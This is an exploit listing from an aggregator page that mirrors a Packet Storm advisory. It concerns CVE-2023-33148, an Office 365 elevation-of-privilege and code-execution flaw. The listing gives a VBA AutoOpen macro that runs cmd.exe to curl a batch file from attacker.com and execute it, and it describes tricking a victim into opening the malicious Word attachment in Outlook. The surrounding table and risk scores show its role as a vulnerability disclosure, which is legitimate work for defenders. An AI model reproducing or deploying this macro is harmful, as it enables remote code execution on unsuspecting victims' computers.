Microsoft Office 365 18.2305.1222.0 Remote Code Execution

🗓️ 19 Jul 2023 00:00:00Reported by nu11secur1tyType

packetstorm🔗 packetstormsecurity.com👁 436 Views

Microsoft Office 365 18.2305.1222.0 Remote Code Execution Vulnerabilit

Reporter	Title	Published	Views	Family All 19
0day.today	Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege / Remote Code Execution	21 Jul 202300:00	–	zdt
BDU FSTEC	The vulnerability of the Microsoft Office suite is related to deficiencies in access control, which allow attackers to elevate their privileges within the system.	18 Jul 202300:00	–	bdu_fstec
Circl	CVE-2023-33148	19 Jul 202311:01	–	circl
CNNVD	Microsoft Office 安全漏洞	11 Jul 202300:00	–	cnnvd
CVE	CVE-2023-33148	11 Jul 202317:02	–	cve
Cvelist	CVE-2023-33148 Microsoft Office Elevation of Privilege Vulnerability	11 Jul 202317:02	–	cvelist
Exploit DB	Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.	20 Jul 202300:00	–	exploitdb
EUVD	EUVD-2023-37333	3 Oct 202520:07	–	euvd
Kaspersky	KLA50773 Multiple vulnerabilities in Microsoft Office	11 Jul 202300:00	–	kaspersky
Microsoft CVE	Microsoft Office Elevation of Privilege Vulnerability	11 Jul 202307:00	–	mscve

`## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of  
Privilege Vulnerability + RCE.  
## Author: nu11secur1ty  
## Date: 07.18.2023  
## Vendor: https://www.microsoft.com/  
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office  
## Reference: https://portswigger.net/web-security/access-control  
## CVE-2023-33148  
  
  
## Description:  
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to  
Elevation of Privilege.  
The attacker can use this vulnerability to attach a very malicious  
WORD file in the Outlook app which is a part of Microsoft Office 365  
and easily can trick the victim to click on it - opening it and  
executing a very dangerous shell command, in the background of the  
local PC. This execution is without downloading this malicious file,  
and this is a potential problem and a very dangerous case! This can be  
the end of the victim's PC, it depends on the scenario.  
WARNING! Office 365 executes files directly from Outlook, without temp  
downloading, security checking and etc.  
  
  
## Staus: HIGH Vulnerability  
  
[+]Exploit:  
  
- - - NOTE:  
This exploit is connected to the third-party server, and when the  
victim clicks on it and opens it the content of the script which is  
inside will fetch on the machine locally and execute himself by using  
MS Office 365 and Outlook app which is a part of the 365 API.  
  
```vb  
Sub AutoOpen()  
Call Shell("cmd.exe /S /c" & "curl -s  
https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat  
&& .\salaries.bat", vbNormalFocus)  
End Sub  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)  
  
## Proof and Exploit  
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)  
  
## Time spend:  
00:35:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`

19 Jul 2023 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 3.17.8

EPSS0.0234

SSVC